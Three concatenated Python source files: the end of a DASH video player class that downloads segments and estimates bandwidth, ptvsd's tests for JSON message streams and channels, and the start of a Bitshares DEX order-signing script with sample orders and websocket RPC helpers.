                    .candidate(int(self.bandwidth))
                if representation:
                    self.managed_objects['download'].add(representation)
                else:
                    time.sleep(0.01)
            else:
                time.sleep(0.01)

    def _setup_scheduled_stop(self, time_):
        """
        If defined in the configuration options, stop the player at a
        predetermined time.
        """
        if time_:
            self.start_timed_thread(time_, self.exit)

    def exit(self):
        """Stop playback and exit player."""
        self.state = 'exit'
        self.stop()
        os._exit(0)  # TODO: No cleanup on exit
        # sys.exit(0)

    def pause(self):
        """Pause playback."""
        self.state = 'pause'
        self._modify_state('pause')

    def resume(self):
        """Resume playback."""
        self.state = 'play'
        self._modify_state('resume')

    def stop(self):
        """Stop playback."""
        self.state = 'stop'
        # BUG FIX: stop() can run before the first progress bar exists (e.g.
        # exit() on an empty playlist, or a SIGINT during startup); guard the
        # None default so shutdown does not die with an AttributeError.
        if self.progress_bar is not None:
            self.progress_bar.suffix = '0:00 / 0:00 / stop'
            self.progress_bar.next(0)
        self._modify_state('stop')

    def _modify_state(self, method=None):
        """Call given method on each of the managed objects."""
        for _, val in self.managed_objects.items():
            try:
                getattr(val, method)()
            except AttributeError:
                # Object is None or does not implement this method; skip it.
                pass

    def _setup_signal_handling(self):
        """Setup interrupt signal handling."""
        signal.signal(signal.SIGINT, self._signal_handler)
        signal.signal(signal.SIGQUIT, self._signal_handler)

    def _signal_handler(self, signum, frame):
        """Handle interrupt signals from user."""
        self.exit()

    def make_request(self, item):
        """Make a HTTP request for a single item within the playback queue.

        Returns the `requests` response object, or None if the request timed
        out or the connection failed.
        """
        url = item['url']
        headers = {}
        if item['bytes_to'] != 0:
            # Partial content: request only the byte range for this segment.
            byte_range = 'bytes=%s-%s' % (item['bytes_from'], item['bytes_to'])
            headers['Range'] = byte_range
        try:
            response = self.session.get(url, headers=headers,
                                        timeout=float(self.options.timeout))
        except requests.exceptions.Timeout as exception:
            self.event('error', 'timeout: ' + str(exception))
            response = None  # Return a None value if timeout occurred
        except requests.exceptions.ConnectionError as exception:
            self.event('error', 'connection error: ' + str(exception))
            response = None  # Return a None value if connection has failed
        # BUG FIX: the original closed response.connection unconditionally,
        # which raised AttributeError whenever the request had failed above
        # and response was None.
        if response is not None and not self.options.keep_alive:
            response.connection.close()
        return response

    def open_file(self, path):
        """Open a file (relative to the session directory) and return its handle."""
        file_name = self.directory + path
        return open(file_name, 'w')

    def fetch_item(self, item, dummy=False):
        """
        Fetch an individual item from a remote location.

        Writes the item to file. Also updates the bandwidth based upon the
        duration of the transaction and the amount of bits received in that
        time.

        Returns:
            duration: time taken to fulfil the request
            length: response length for use with the MPD '@bandwidth' value
                (in bits).
            path: location the content was written to ('' when not writing).
        """
        if not dummy:
            self.event('start', 'downloading ' + str(item['url']))
            response, duration = self._time_request(item)
            if not response:
                # Request failed entirely; fall back to an empty dummy write
                # so downstream bookkeeping can continue.
                self.event('error', 'no response returned from '
                           + str(item['url']) + '; writing to dummy file')
                return self.fetch_item(item, dummy=True)
            self._check_code(response.status_code, item['url'])
            length = get_length(response)
            path = self._write_to_file(item, response.content)
            self.update_bandwidth(duration, length)
            self.event('stop', 'downloading ' + str(item['url']) +
                       ' (' + str(length) + 'b)')
            return duration, length, path
        else:
            path = self._write_to_file(item, '')
            return 0, 0, path

    def item_ready(self, item):
        """Add a given item to the playback queue."""
        self.managed_objects['playback'].add(item)

    def retrieve_metric(self, metric, func=None):
        """Retrieve given metric from the download and playback queues."""
        if func:
            self._modify_state(func)
        result = {}
        for obj in ['download', 'playback']:
            result[obj] = self.managed_objects[obj].__dict__[metric]
        return result

    def max_seg_duration(self):
        """Return maximum segment duration in the current representations."""
        return self.managed_objects['representations'].max_seg_duration

    def mpd_duration(self):
        """Return the MPD duration of the current set of representations."""
        return self.managed_objects['representations'].mpd_duration

    def report_tick(self):
        """Call report method on each of the managed objects."""
        self._modify_state('report_tick')

    def _time_request(self, item):
        """Make request and time response."""
        start = time.time()
        response = self.make_request(item)
        duration = time.time() - start
        return response, duration

    def _check_code(self, code, url):
        """Checks if the request was successful (using the HTTP error code)."""
        if code >= 400:
            self.event('error', 'could not download '
                       + url + ' (code ' + str(code) + ')')
            raise SystemExit()

    def _write_to_file(self, item, content):
        """
        Write response content to file.

        This may be a complete file, or a byte range to an existing file.
        """
        if self.options.write:
            file_name = item['url'].split('/')[-1]
            path = self.directory + '/downloads/' + file_name
            file_start = int(item['bytes_from'])
            file_end = int(item['bytes_to'])
            try:
                if os.path.isfile(path):
                    _file = open(path, 'r+')  # patch a range into existing file
                else:
                    _file = open(path, 'w')
            except IOError as exception:
                self.event('error', 'could not append or write to file: '
                           + str(exception))
                return path
            _file.seek(int(item['bytes_from']))
            try:
                _file.write(content)
            except IOError as exception:
                self.event('error', str(exception))
            file_pointer = int(_file.tell() - 1)
            if file_end != file_pointer and file_start != 0:
                # Parenthesised single-argument print produces identical
                # output on Python 2 and also parses on Python 3.
                print('ends do not match')
            _file.close()
        else:
            path = ''
        return path

    def update_bandwidth(self, duration, length):
        """Update the current bandwidth estimation."""
        # Ignore degenerate samples (zero elapsed time or zero payload).
        if duration and length:
            self.bandwidth.change(int(length / duration))

    def start_thread(self, target, args=(), **kwargs):
        """Wrapper for the `threading.Thread` module. Track threads."""
        thread = threading.Thread(target=target, args=args, kwargs=kwargs)
        thread.daemon = True
        thread.start()
        self.threads.append(thread)
        return thread

    def start_timed_thread(self, interval, function, args=()):
        """Wrapper for the `threading.Timer` module. Track threads."""
        thread = threading.Timer(
            interval=float(interval),
            function=function, args=args)
        thread.daemon = True
        thread.start()
        self.threads.append(thread)
        return thread

    def create_directory(self, path=''):
        """Create a new directory at the given path."""
        path = self.directory + path
        if not os.path.exists(path):
            try:
                os.makedirs(path)
            except OSError:
                # Directory creation raced or permissions failed; report only.
                self.event('error', 'could not create dir')
        return path

    def _create_progress_bar(self):
        """Create a progress bar, or a no-op bar when debug output is on."""
        if not self.options.debug:
            return progressbar.PlaybackBar(player=self,
                                           max=self
                                           .managed_objects['representations']
                                           .mpd_duration)
        else:
            return progressbar.NullBar()

    def event(self, action, event):
        """Register event with the reporting module."""
        try:
            self.managed_objects['reporter'].event(action, event)
        except AttributeError:
            # No reporter yet -- fall back to stdout.  '%s %s' % (...) keeps
            # the Python 2 `print action, event` output and runs on Python 3.
            print('%s %s' % (action, event))
def get_length(response):
    """
    Get length of response from HTTP response header, in bits.

    Falls back to measuring the response content when the Content-Length
    header is absent (None -> TypeError) or malformed (non-numeric string ->
    ValueError; the original code crashed on this case).  The octet count is
    multiplied by 8 because the bandwidth estimation algorithm works in bits.
    """
    try:
        length = int(response.headers.get('Content-Length'))
    except (TypeError, ValueError):
        # Header missing or not a number -- use the actual body size.
        length = len(response.content)
    length = length * 8
    return length
def remove_directory(path):
    """Delete the directory tree at *path*; silently a no-op if it is absent."""
    if not os.path.exists(path):
        return
    shutil.rmtree(path)
|
test_messaging.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import print_function, with_statement, absolute_import
import json
import io
import pytest
import random
import socket
import threading
import time
from ptvsd.messaging import JsonIOStream, JsonMessageChannel, Response
from .helpers.messaging import JsonMemoryStream, LoggingJsonStream
class TestJsonIOStream(object):
    """Exercises JsonIOStream round-tripping over a fixed set of DAP requests."""

    MESSAGE_BODY_TEMPLATE = u'{"arguments": {"threadId": 3}, "command": "next", "seq": %d, "type": "request"}'
    MESSAGES = []
    SERIALIZED_MESSAGES = b''

    @classmethod
    def setup_class(cls):
        # Build three messages and their Content-Length-framed wire form.
        for seq in range(3):
            body_text = cls.MESSAGE_BODY_TEMPLATE % seq
            cls.MESSAGES.append(json.loads(body_text))
            body_bytes = body_text.encode('utf-8')
            header = (u'Content-Length: %d\r\n\r\n' % len(body_bytes)).encode('ascii')
            cls.SERIALIZED_MESSAGES += header + body_bytes

    def test_read(self):
        """Each framed message parses back in order; EOF raises EOFError."""
        data = io.BytesIO(self.SERIALIZED_MESSAGES)
        stream = JsonIOStream(data, data)
        for expected in self.MESSAGES:
            assert stream.read_json() == expected
        with pytest.raises(EOFError):
            stream.read_json()

    def test_write(self):
        """Writing the messages reproduces the serialized byte stream exactly."""
        buffer = io.BytesIO()
        stream = JsonIOStream(buffer, buffer)
        for message in self.MESSAGES:
            stream.write_json(message)
        assert buffer.getvalue() == self.SERIALIZED_MESSAGES
class TestJsonMemoryStream(object):
    """Exercises the in-memory JSON stream test helper."""

    MESSAGES = [
        {'seq': 1, 'type': 'request', 'command': 'next', 'arguments': {'threadId': 3}},
        {'seq': 2, 'type': 'request', 'command': 'next', 'arguments': {'threadId': 5}},
    ]

    def test_read(self):
        """Queued messages come back in order; the empty stream raises EOFError."""
        stream = JsonMemoryStream(self.MESSAGES, [])
        for expected in self.MESSAGES:
            assert stream.read_json() == expected
        with pytest.raises(EOFError):
            stream.read_json()

    def test_write(self):
        """Written messages accumulate in the supplied output list."""
        written = []
        stream = JsonMemoryStream([], written)
        for message in self.MESSAGES:
            stream.write_json(message)
        assert written == self.MESSAGES
class TestJsonMessageChannel(object):
    """Tests for JsonMessageChannel: event dispatch, request handling,
    response correlation, and a socket-based concurrent fuzz test.
    """
    @staticmethod
    def iter_with_event(collection):
        """Like iter(), but also exposes a threading.Event that is set
        when the returned iterator is exhausted.
        """
        exhausted = threading.Event()
        def iterate():
            for x in collection:
                yield x
            exhausted.set()
        return iterate(), exhausted
    def test_events(self):
        """Events dispatch to '<name>_event' handlers; unknown events fall
        back to the generic 'event' handler."""
        EVENTS = [
            {'seq': 1, 'type': 'event', 'event': 'stopped', 'body': {'reason': 'pause'}},
            {'seq': 2, 'type': 'event', 'event': 'unknown', 'body': {'something': 'else'}},
        ]
        events_received = []
        class Handlers(object):
            def stopped_event(self, channel, body):
                events_received.append((channel, body))
            def event(self, channel, event, body):
                # Generic fallback for events without a dedicated handler.
                events_received.append((channel, event, body))
        input, input_exhausted = self.iter_with_event(EVENTS)
        stream = LoggingJsonStream(JsonMemoryStream(input, []))
        channel = JsonMessageChannel(stream, Handlers())
        channel.start()
        # Wait until the channel's reader thread has consumed all input.
        input_exhausted.wait()
        assert events_received == [
            (channel, EVENTS[0]['body']),
            (channel, 'unknown', EVENTS[1]['body']),
        ]
    def test_requests(self):
        """Requests dispatch to '<command>_request' handlers; a handler's
        return value becomes the response body, and a raised exception
        becomes a failure response."""
        REQUESTS = [
            {'seq': 1, 'type': 'request', 'command': 'next', 'arguments': {'threadId': 3}},
            {'seq': 2, 'type': 'request', 'command': 'unknown', 'arguments': {'answer': 42}},
            {'seq': 3, 'type': 'request', 'command': 'pause', 'arguments': {'threadId': 5}},
        ]
        requests_received = []
        class Handlers(object):
            def next_request(self, channel, arguments):
                requests_received.append((channel, arguments))
                return {'threadId': 7}
            def request(self, channel, command, arguments):
                # Generic fallback for commands without a dedicated handler.
                requests_received.append((channel, command, arguments))
            def pause_request(self, channel, arguments):
                requests_received.append((channel, arguments))
                raise RuntimeError('pause error')
        input, input_exhausted = self.iter_with_event(REQUESTS)
        output = []
        stream = LoggingJsonStream(JsonMemoryStream(input, output))
        channel = JsonMessageChannel(stream, Handlers())
        channel.start()
        input_exhausted.wait()
        assert requests_received == [
            (channel, REQUESTS[0]['arguments']),
            (channel, 'unknown', REQUESTS[1]['arguments']),
            (channel, REQUESTS[2]['arguments']),
        ]
        assert output == [
            {'seq': 1, 'type': 'response', 'request_seq': 1, 'command': 'next', 'success': True, 'body': {'threadId': 7}},
            {'seq': 2, 'type': 'response', 'request_seq': 2, 'command': 'unknown', 'success': True},
            {'seq': 3, 'type': 'response', 'request_seq': 3, 'command': 'pause', 'success': False, 'message': 'pause error'},
        ]
    def test_responses(self):
        """Responses are correlated to their requests; callbacks fire whether
        registered before or after the response arrives."""
        request1_sent = threading.Event()
        request2_sent = threading.Event()
        request3_sent = threading.Event()
        def iter_responses():
            # Each response is released only after its request has been sent,
            # so correlation order is deterministic.
            request1_sent.wait()
            yield {'seq': 1, 'type': 'response', 'request_seq': 1, 'command': 'next', 'success': True, 'body': {'threadId': 3}}
            request2_sent.wait()
            yield {'seq': 2, 'type': 'response', 'request_seq': 2, 'command': 'pause', 'success': False, 'message': 'pause error'}
            request3_sent.wait()
            yield {'seq': 3, 'type': 'response', 'request_seq': 3, 'command': 'next', 'success': True, 'body': {'threadId': 5}}
        stream = LoggingJsonStream(JsonMemoryStream(iter_responses(), []))
        channel = JsonMessageChannel(stream, None)
        channel.start()
        # Blocking wait.
        request1 = channel.send_request('next')
        request1_sent.set()
        response1 = request1.wait_for_response()
        assert response1 == Response(True, 'next', body={'threadId': 3})
        # Async callback, registered before response is received.
        request2 = channel.send_request('pause')
        response2 = [None]
        response2_received = threading.Event()
        def response2_handler(response):
            response2[0] = response
            response2_received.set()
        request2.on_response(response2_handler)
        request2_sent.set()
        response2_received.wait()
        assert response2[0] == Response(False, 'pause', error_message='pause error')
        # Async callback, registered after response is received.
        request3 = channel.send_request('next')
        request3_sent.set()
        request3.wait_for_response()
        response3 = [None]
        response3_received = threading.Event()
        def response3_handler(response):
            response3[0] = response
            response3_received.set()
        request3.on_response(response3_handler)
        response3_received.wait()
        assert response3[0] == Response(True, 'next', body={'threadId': 5})
    def test_fuzz(self):
        # Set up two channels over the same stream that send messages to each other
        # asynchronously, and record everything that they send and receive.
        # All records should match at the end.
        class Fuzzer(object):
            def __init__(self, name):
                self.name = name
                # One lock guards all record lists; handlers run on the
                # channel's reader thread while the worker thread also appends.
                self.lock = threading.Lock()
                self.sent = []
                self.received = []
                self.responses_sent = []
                self.responses_received = []
            def start(self, channel):
                # Daemon worker so a hung fuzz run cannot block interpreter exit.
                self._worker = threading.Thread(name=self.name, target=lambda: self._send_requests_and_events(channel))
                self._worker.daemon = True
                self._worker.start()
            def wait(self):
                self._worker.join()
            def fizz_event(self, channel, body):
                with self.lock:
                    self.received.append(('event', 'fizz', body))
            def buzz_event(self, channel, body):
                with self.lock:
                    self.received.append(('event', 'buzz', body))
            def event(self, channel, event, body):
                # Fallback for 'fizzbuzz' (no dedicated handler).
                with self.lock:
                    self.received.append(('event', event, body))
            def make_and_log_response(self, command):
                # Randomly succeed (non-negative) or fail (negative), and
                # record the Response we expect the peer to receive.
                x = random.randint(-100, 100)
                if x >= 0:
                    response = Response(True, command, body=x)
                else:
                    response = Response(False, command, error_message=str(x))
                with self.lock:
                    self.responses_sent.append(response)
                if response.success:
                    return x
                else:
                    raise RuntimeError(response.error_message)
            def fizz_request(self, channel, arguments):
                with self.lock:
                    self.received.append(('request', 'fizz', arguments))
                return self.make_and_log_response('fizz')
            def buzz_request(self, channel, arguments):
                with self.lock:
                    self.received.append(('request', 'buzz', arguments))
                return self.make_and_log_response('buzz')
            def request(self, channel, command, arguments):
                # Fallback request handler for 'fizzbuzz'.
                with self.lock:
                    self.received.append(('request', command, arguments))
                return self.make_and_log_response(command)
            def _send_requests_and_events(self, channel):
                # Single-element list so the nested response_handler closures
                # can mutate the counter.
                pending_requests = [0]
                for _ in range(0, 100):
                    typ = random.choice(('event', 'request'))
                    name = random.choice(('fizz', 'buzz', 'fizzbuzz'))
                    body = random.randint(0, 100)
                    with self.lock:
                        self.sent.append((typ, name, body))
                    if typ == 'event':
                        channel.send_event(name, body)
                    elif typ == 'request':
                        with self.lock:
                            pending_requests[0] += 1
                        req = channel.send_request(name, body)
                        def response_handler(response):
                            with self.lock:
                                self.responses_received.append(response)
                                pending_requests[0] -= 1
                        req.on_response(response_handler)
                # Spin until we get responses to all requests.
                while True:
                    with self.lock:
                        if pending_requests[0] == 0:
                            break
                    time.sleep(0.1)
        fuzzer1 = Fuzzer('fuzzer1')
        fuzzer2 = Fuzzer('fuzzer2')
        # Connect the two channels over a real localhost socket pair.
        server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server_socket.bind(('localhost', 0))
        _, port = server_socket.getsockname()
        server_socket.listen(0)
        socket1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socket1_thread = threading.Thread(target=lambda: socket1.connect(('localhost', port)))
        socket1_thread.start()
        socket2, _ = server_socket.accept()
        socket1_thread.join()
        try:
            # Unbuffered (0) file objects so messages flush immediately.
            io1 = socket1.makefile('rwb', 0)
            io2 = socket2.makefile('rwb', 0)
            stream1 = LoggingJsonStream(JsonIOStream(io1, io1))
            channel1 = JsonMessageChannel(stream1, fuzzer1)
            channel1.start()
            fuzzer1.start(channel1)
            stream2 = LoggingJsonStream(JsonIOStream(io2, io2))
            channel2 = JsonMessageChannel(stream2, fuzzer2)
            channel2.start()
            fuzzer2.start(channel2)
            fuzzer1.wait()
            fuzzer2.wait()
        finally:
            socket1.close()
            socket2.close()
        # Everything sent by one side must have been received by the other.
        assert fuzzer1.sent == fuzzer2.received
        assert fuzzer2.sent == fuzzer1.received
        assert fuzzer1.responses_sent == fuzzer2.responses_received
        assert fuzzer2.responses_sent == fuzzer1.responses_received
|
manualSIGNING.py |
#=======================================================================
VERSION = 'Bitshares manualSIGNING 0.00000005'
#=======================================================================
# Authenticated BUY/SELL/CANCEL without Pybitshares(MIT) Architecture
' litepresence 2019 '
def WTFPL_v0_March_1765():
    # Satirical "license" stub.  None of the names referenced below
    # (stamps, licenses, taxation, regulation, fiat, etat, tar, feathers)
    # are defined anywhere in this module, so actually calling this
    # function raises NameError immediately.  Kept verbatim: it is a
    # joke, not executable logic.
    if any([stamps, licenses, taxation, regulation, fiat, etat]):
        try:
            print('no thank you')
        except:
            return [tar, feathers]
' ********** ALPHA RELEASE TO PUBLIC DOMAIN WITH NO WARRANTY ********* '
# Joe CEX algo trader finds Bitshares DEX and asks:
# How do I get good public API data that never goes stale?
' metaNODE.py'
# How do I authenticate?
' manualSIGNING.py '
# What nodes to use?
' latencyTEST.py'
# three 50KB scripts and DEX algo trading barriers to entry defeated
# nothing else to learn to be connected and authenticated
# buy/sell/cancel - six sigma connectivity - simple auth - cex like data
# need more?
# buy/sell/cancel + orderbooks UI
' microDEX.py '
# Algo Trading and Backtesting Engine
' extinctionEVENT.py '
# Historical Return on Investment
' accountBALANCES.py '
# whitepaper
' metaNODEwhitepaper.md'
' manualSIGNINGwhitepaper.md'
' ********************************************** '
' ****** API CHANGE IN VERSION 0.00000003 ****** '
' ********************************************** '
# order is now a dictionary of:
"['edicts', 'header', 'nodes']"
# see sample_orders() for examples
' NEW FEATURES '
# prototype_order() leverages metaNODE to build order header template
# edicts can be any mixed list of buy/sell/cancel
# autoscale buy/sell orders to account means if overbudget
# autoscale buy/sell orders to retain last two bitshares for fees
# multiprocessing ensures websockets and faulty orders timeout
# control_panel() advanced user controls to alter execution behaviors
# new edict {'op':login} matches wif to account name; returns True/False
# no pybitshares dependencies
' HOW DO I USE THIS THING? '
' from manualSIGNING import broker '
' broker(order) '
' OBJECTIVES '
'import only standard python objects' # DONE
'gather needed pybitshares objects: copy, paste, and cite' # DONE
'strip pybitshares objects of unused methods' # DONE
'restack classes and definitions chronologically' # DONE
'allow orders to be placed in human terms' # DONE
'build tx in graphene terms' # DONE
'serialize tx' # DONE
'validate serialization via get_transaction_hex_without_sig()' # DONE
'sign tx with ECDSA' # DONE
'validate signed tx' # DONE
'broadcast tx to rpc node' # DONE
'allow this script to be imported as module; broker(order)' # DONE
'allow list of buy/sell/cancel edicts' # DONE
'allow cancel-all' # DONE
'heavy line-by-line commentary' # DONE
'extinctionEVENT implementation' # DONE
'microDEX implementation' # DONE
'simplify and condense pybitshares methods' # ONGOING
'whitepaper readme.md' # 5200 word rough draft, editing ongoing
'convert from object-oriented (class) to procedural (def) style' # TODO
' DEPENDENCIES '
# python 3 on a linux box
# pip3 install: ecdsa, secp256k1, websocket-client
' LICENSE: '
# citations to pybitshares(MIT) & @xeroc where pertinent
# h/t @vvk123 @sschiessl @harukaff_bot
# remainder WTFPL March 1765
DEV = False
COLOR = True
' STANDARD PYTHON MODULES '
from time import time, ctime, mktime, strptime
from multiprocessing import Process, Value # encapsulate processes
from decimal import Decimal as decimal # higher precision than float
from json import dumps as json_dumps # serialize object to string
from json import loads as json_loads # deserialize string to object
from collections import OrderedDict
from traceback import format_exc # stack trace in terminal
from datetime import datetime
from calendar import timegm
from getpass import getpass # hidden input()
from random import shuffle
from pprint import pprint # pretty printing
import math
import sys
import os
' STANDARD CONVERSION UTILITIES '
from binascii import hexlify # binary text to hexidecimal
from binascii import unhexlify # hexidecimal to binary text
from zlib import decompress # aka gzip inflate; only used for logo
from hashlib import sha256 # message digest algorithm
from hashlib import new as hashlib_new # access algorithm library
from struct import pack # convert to string representation of C struct
from struct import unpack, unpack_from # convert back to PY variable
' NON STANDARD MODULES WHICH REQUIRE INSTALLATION '
print('sudo apt update')
print('sudo apt install python3-pip')
print('pip3 install websocket-client')
print('pip3 install secp256k1')
print('pip3 install ecdsa')
from websocket import create_connection as wss # handshake to node
from secp256k1 import PrivateKey as secp256k1_PrivateKey # class
from secp256k1 import PublicKey as secp256k1_PublicKey # class
from secp256k1 import ffi as secp256k1_ffi # compiled ffi object
from secp256k1 import lib as secp256k1_lib # library
from ecdsa import numbertheory as ecdsa_numbertheory # largest import
from ecdsa import VerifyingKey as ecdsa_VerifyingKey # class
from ecdsa import SigningKey as ecdsa_SigningKey # class
from ecdsa import SECP256k1 as ecdsa_SECP256k1 # curve
from ecdsa import util as ecdsa_util # module
from ecdsa import der as ecdsa_der # module
print("\033c") # clear screen if they are all installed
' litepresence/extinction-event MODULES '
from metaNODE import Bitshares_Trustless_Client
' LINUX AND PYTHON 3 REQUIRED '
# require a serious professional audience on linux/py3 installation
from sys import platform, version_info
# hard requirement: this signing flow is only supported on linux + py3
if 'linux' not in platform:
    raise Exception('not a linux box, format drive and try again...')
if version_info[0] < 3:
    # BUG FIX: the original format string was "% is DED ..." which has no
    # valid conversion for the version number and produced a garbled
    # message; "%s" interpolates the python major version correctly
    raise Exception("%s is DED, long live Python 3.4+" % version_info[0])
' PRINT CONTROL '
def blockPrint():
    # temporarily disable printing
    # Redirects sys.stdout to /dev/null; undo with enablePrint().
    # NOTE(review): the devnull handle is never closed, so every call
    # leaks one file descriptor until interpreter exit.
    sys.stdout = open(os.devnull, 'w')
def enablePrint():
    # re-enable printing
    # Restores the interpreter's original stdout kept in sys.__stdout__.
    sys.stdout = sys.__stdout__
def trace(e):
    # Print a readable stack trace for exception `e`:
    # exception class name, its args tuple, then the formatted traceback.
    report = [
        str(type(e).__name__),
        str(e.args),
        str(format_exc()),
        '',
    ]
    print('\n'.join(report))
' GLOBALS '
def sample_orders():
    # Populate three example orders in module globals:
    #   order1 - two limit buys, order2 - cancel all, order3 - login check.
    # Every order dict carries the keys ['edicts', 'header', 'nodes'].
    global order1, order2, order3

    def _header():
        # fresh header template per order; user fills in real values
        return {'asset_id': '1.3.0',
                'currency_id': '1.3.861',
                'asset_precision': 5,
                'currency_precision': 8,
                'account_id': '1.2.x',
                'account_name': '',
                'wif': '',
                }

    def _nodes():
        # fresh node list per order so one order cannot mutate another's
        return [
            'wss://chicago.bitshares.apasia.tech/ws',
            'wss://new-york.bitshares.apasia.tech/ws',
            'wss://seattle.bitshares.apasia.tech/ws',
            'wss://us-ny.bitshares.apasia.tech/ws',
            'wss://us-la.bitshares.apasia.tech/ws',
        ]

    # cancel all and place two buy orders
    order1 = {
        'edicts': [
            {'op': 'buy',
             'amount': 10.0,
             'price': 0.00000100,
             'expiration': 0},
            {'op': 'buy',
             'amount': 30.0,
             'price': 0.00000150,
             'expiration': 0},
        ],
        'header': _header(),
        'nodes': _nodes(),
    }
    # cancel all open orders in this market; to cancel specific orders
    # instead use e.g. {'op': 'cancel', 'ids': ['1.7.101', '1.7.102']}
    order2 = {
        'edicts': [
            {'op': 'cancel',
             'ids': ['1.7.X']},  # '1.7.X' means cancel all
        ],
        'header': _header(),
        'nodes': _nodes(),
    }
    # login only: match wif to account name
    order3 = {
        'edicts': [{'op': 'login'}
                   ],
        'header': _header(),
        'nodes': _nodes(),
    }
def global_variables():
    # Initialize mutable module-level state.
    global info
    # 'id' is the json-rpc request counter, incremented per request
    info = {'id': 1}
def global_constants():
    # Define protocol-level constants used throughout serialization.
    global OP_IDS, OP_NAMES, ID, TYPES, SATOSHI, SIXSIG
    global BASE58, HEXDIGITS, ISO8601, END_OF_TIME
    # wire operation ids; see bitsharesbase/operationids.py
    OP_IDS = {
        "Limit_order_create": 1,
        "Limit_order_cancel": 2,
    }
    # reverse lookup: operation id -> operation name
    OP_NAMES = dict((number, name) for name, number in OP_IDS.items())
    # mainnet chain id; see bitsharesbase/chains.py
    ID = "4018d7844c78f6a6c41c6a552b898022310fc5dec06da467ee7905a8dad512c8"
    # object type numbers used by ObjectId() to confirm a.b.c ids;
    # see bitsharesbase/objecttypes.py
    TYPES = {
        "account": 2,      # 1.2.x
        "asset": 3,        # 1.3.x
        "limit_order": 7,  # 1.7.x
    }
    # the base58 alphabet used for encoding and decoding
    BASE58 = b"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
    # characters accepted as hexadecimal
    HEXDIGITS = "0123456789abcdefABCDEF"
    # 'graphene time' string format (ISO8601)
    ISO8601 = '%Y-%m-%dT%H:%M:%S%Z'
    # wire max is 4294967295 (year 2106, 4 byte unsigned integer);
    # 4e9 is roughly 75 years in the future, safely below the cap
    END_OF_TIME = 4 * 10 ** 9
    # smallest representable amount
    SATOSHI = decimal(0.00000001)
    # almost unity
    SIXSIG = decimal(0.999999)
def control_panel():
    # Set module globals that tune execution behavior.
    global HANDSHAKE_TIMEOUT, PROCESS_TIMEOUT, AUTOSCALE, BTS_FEES
    global KILL_OR_FILL, ATTEMPTS, JOIN, LIMIT, DUST
    ' advanced user controls to alter execution behaviors '
    # seconds allowed for a websocket handshake before trying a new node
    HANDSHAKE_TIMEOUT = 4
    # seconds each multiprocessing handler may live
    PROCESS_TIMEOUT = 20
    # False leaves limit orders on the books until filled or cancelled
    KILL_OR_FILL = False
    # True scales an oversized gross order down to account means
    AUTOSCALE = True
    # True always reserves the last 2 bitshares for network fees
    BTS_FEES = True
    # how many times to respawn a failed broker process
    ATTEMPTS = 3
    # cap on machine-generated edicts per order
    LIMIT = 20
    # True blocks the parent process until the order completes
    JOIN = True
    # skip orders worth less than roughly DUST bitshares; 0 disables
    DUST = 20
' COLOR TERMINAL '
def red(text):
    # Wrap text in ANSI bright-red codes when COLOR is enabled.
    if COLOR:
        return '\033[91m' + text + '\033[0m'
    return text
def green(text):
    # Wrap text in ANSI bright-green codes when COLOR is enabled.
    if COLOR:
        return '\033[92m' + text + '\033[0m'
    return text
def yellow(text):
    # Wrap text in ANSI bright-yellow codes when COLOR is enabled.
    if COLOR:
        return '\033[93m' + text + '\033[0m'
    return text
def blue(text):
    # Wrap text in ANSI bright-blue codes when COLOR is enabled.
    if COLOR:
        return '\033[94m' + text + '\033[0m'
    return text
def purple(text):
    # Wrap text in ANSI code 105 (bright magenta background) when COLOR
    # is enabled.
    if COLOR:
        return '\033[105m' + text + '\033[0m'
    return text
def cyan(text):
    # Wrap text in ANSI bright-cyan codes when COLOR is enabled.
    if COLOR:
        return '\033[96m' + text + '\033[0m'
    return text
' REMOTE PROCEDURE CALLS TO PUBLIC API NODES'
def wss_handshake():
    """Open a fresh websocket connection within HANDSHAKE_TIMEOUT seconds.

    Rotates through the global node list (shuffled once per call) until
    some node completes the handshake quickly enough, then stores the
    live connection in the global ``ws``.
    """
    print(purple('wss_handshake - node list is hard coded'))
    print('in production use latencyTEST.py to generate list')
    global ws, nodes  # the websocket is created and node list shuffled
    shuffle(nodes)
    handshake = 999  # sentinel forces at least one connection attempt
    while handshake > HANDSHAKE_TIMEOUT:
        try:
            try:
                # BUG FIX: was ``ws.close`` -- a bare attribute access that
                # never closed anything; the method must be *called* to
                # terminate a stale connection
                ws.close()
                print(purple('connection terminated'))
            except Exception:
                pass  # no previous connection to close
            start = time()
            nodes.append(nodes.pop(0))  # rotate list
            node = nodes[0]
            print(purple('connecting:'), node)
            ws = wss(node, timeout=HANDSHAKE_TIMEOUT)
            handshake = (time() - start)
        except Exception:
            # connection failed; loop again with the next node
            continue
    print(purple('connected:'), node, ws)
    print('elapsed %.3f sec' % (time() - start))
def wss_query(params):
    """Send one remote procedure call and return its result.

    ``params`` is the 3-part rpc payload ["location", "object", [args]].
    Retries up to 10 times, switching nodes via wss_handshake() after any
    failure.  Raises RuntimeError when every attempt fails.
    """
    for i in range(10):
        try:
            # this is the 4 part format of EVERY rpc request
            query = json_dumps({"method": "call",
                                "params": params,
                                "jsonrpc": "2.0",
                                "id": 1})
            # ws is the websocket connection created by wss_handshake();
            # send the query and block for the json reply
            ws.send(query)
            ret = json_loads(ws.recv())
            try:
                ret = ret['result']  # unwrap the result key when present
            except (KeyError, TypeError):
                pass  # some calls return the bare object
            return ret
        except Exception as e:
            try:  # attempt to terminate the connection
                ws.close()
            except Exception:
                pass
            trace(e)  # tell me what happened
            # switch nodes and retry
            wss_handshake()
            continue
    # BUG FIX: the original bare ``raise`` here had no active exception
    # and itself crashed with RuntimeError("No active exception to
    # re-raise"); raise an explicit RuntimeError (same type callers
    # would have observed) with a useful message instead
    raise RuntimeError('wss_query failed 10 times: %s' % params)
def rpc_block_number():
    # Fetch dynamic global properties, which carry the current block
    # number and block prefix needed for transaction headers.
    return wss_query(["database",
                      "get_dynamic_global_properties",
                      []])
def rpc_account_id():
    # Resolve the global account_name to its 1.2.x account id.
    reply = wss_query(["database",
                       "lookup_accounts",
                       [account_name, 1]])
    # lookup_accounts returns [[name, id], ...]; take the first id
    return reply[0][1]
def rpc_fees():
    # Fetch creation/cancellation fees in raw graphene integer terms
    # (caller applies the 10^precision scaling).
    ops = [['1', {"from": str(account_id)}],   # limit_order_create
           ['2', {"from": str(account_id)}]]   # limit_order_cancel
